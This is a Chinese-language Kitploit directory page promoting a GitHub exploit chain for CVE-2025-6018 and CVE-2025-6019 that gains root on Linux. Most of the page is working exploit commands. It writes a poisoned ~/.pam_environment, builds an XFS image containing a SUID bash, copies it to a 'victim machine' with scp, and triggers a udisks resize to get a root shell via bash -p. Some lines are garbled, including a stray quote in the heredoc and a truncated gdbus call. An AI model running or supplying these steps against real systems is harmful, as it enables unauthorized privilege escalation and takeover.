Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/localh0ste/cve-2025-6018-and-cve-2025-6019
权限提升漏洞分析漏洞利用渗透测试红队二进制利用
GitHublocalh0ste/cve-2025-6018-and-cve-2025-6019

CVE-2025-6018-and-CVE-2025-6019

利用 PAM 环境变量投毒(CVE-2025-6018)与 XFS 文件系统调整大小(CVE-2025-6019)的漏洞利用链,在 Linux 系统上获取 root shell 以实现权限提升。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
116个月前尚未审核

检查它是否易受攻击

root@kitploit:~
rpm -q pam || dpkg -l | grep libpam

or

find /etc/pam.d/ -name '*' -exec grep -l 'pam_env' {} \\; 2>/dev/null

or
find /etc/pam.d/ -name '*' -exec grep -l 'pam_systemd' {} \\; 2>/dev/null

or

systemctl --version | head -1

如果版本包含:(检测到易受攻击的 PAM 版本) ~参考 cve_2025_6018

"pam-1.3.0", "pam-1.3.1", "pam-1.4.0", "pam-1.5.0", "pam-1.5.1", "pam-1.5.2", "pam-1.5.3", "pam-1.6.0"

利用步骤

创建恶意环境文件 (CVE-2025-6018 环境投毒)

root@kitploit:~
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
XDG_SESSION_TYPE OVERRIDE=x11
XDG_SESSION_CLASS OVERRIDE=user
XDG_RUNTIME_DIR OVERRIDE=/tmp/runtime
SYSTEMD_LOG_LEVEL OVERRIDE=debug'''
EOF

创建 XFS 镜像(在自己的电脑上)并发送到远程主机

( CVE-2025-6019 -- 通过 libblockdev 中的 XFS Resize 获取 Root 权限)

root@kitploit:~
dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount

#Create SUID bit as /bash shell

chmod 04555 ./xfs.mount/bash
umount ./xfs.mount
gzip xfs.image
scp ./xfs.image.gz hostname@<ip>:/home/<username>

在受害者机器上

root@kitploit:~
gzip -d xfs.image.gz
gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method
gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanReboot

重新连接到系统 ( ssh 重新连接以激活活动会话 )

root@kitploit:~
udisksctl loop-setup --file ./xfs.image --no-user-interaction
while true; do /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break; done 2>/dev/null &
gdbus call --system --dest org.freedesktop.UDisks2 --object-path /org/freedesktop/UDisks2/block_devices/loop0 --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
 /tmp/blockdev*/bash -p

获取 Root Shell

参考: https://www.exploit-db.com/exploits/52386

下载工具